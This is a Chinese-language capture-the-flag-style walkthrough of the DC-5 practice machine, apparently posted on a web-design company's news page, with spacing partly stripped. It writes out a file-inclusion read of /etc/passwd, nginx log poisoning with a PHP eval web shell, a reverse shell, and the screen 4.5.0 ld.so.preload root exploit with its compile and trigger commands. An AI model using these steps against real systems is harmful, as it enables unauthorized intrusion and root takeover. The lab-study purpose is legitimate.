ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

DC-5 靶机全流程攻略

DC-5 靶机全流程攻略 DC-5 靶机攻略扫描靶机目录爆破发现联系页面抓包看一下Sqlmap跑一下没发现注入点之前目录爆破出一个叫footer.php的后台文件访问一下每次刷新年份会改变同时也发现thankyou页面的年份也会变这个内容跟footer文件一样是动态加载的说明thankyou页面可能是调用了footer这个文件但是页面源代码没有写出来说明url应该是隐藏了参数来传递文件这里用ffuf模糊测试工具来测试一下ffuf-uhttp://192.168.200.145/thankyou.php?FUZZtest-w/usr/share/wordlists/dirb/common.txt-fs852ffuf工具名Web 模糊测试工具-u指定目标 URLFUZZ是占位符ffuf 会用字典里的每个词替换它-w字典文件-fs 852过滤掉响应大小为 852 字节的结果可以看到扫出来了file的参数名试试能不能读取文件得到了passwd文件的内容说明确实是存在文件包含的漏洞接下来就是要上传木马到服务器里查资料发现改网站用的web服务器软件是nginx可以通过nginx的错误日志里写入密码来获取shell日志的地址一般都是/var/log/nginx/error.log先试试是不是在这里确实在这里写入木马File?php eval($_POST[cmd]);?连接蚁剑连接失败了应该是在地址栏发送请求时浏览器把木马给编码了蚁剑解析不了用yakit直接发包连接蚁剑反弹shell看提权点sudo-lfind/-perm-us-typef2/dev/nullfind/-perm-4000-typef2/dev/null这里用screen提权因为它有已知漏洞screen-4.5.0 ✅ 版本 4.5.0 有已知漏洞CVE-2017-17087能直接提权到 rootpasswd / chsh / chfn ❌ 系统自带 SUID不能用来提权exim4 ❌ 版本 4.89 也有漏洞但提权流程比 screen 复杂版本是4.5.0用41154.sh这个脚本查看脚本直接写到靶机里编译cd/tmp gcc-fPIC-shared-ldl-olibhax.so libhax.c gcc-orootshell rootshell.c提权cd/etcumask000 /bin/screen-4.5.0-D-m-Lld.so.preloadecho-ne\x0a/tmp/libhax.so/bin/screen-4.5.0-ls/tmp/rootshell找到flag
返回列表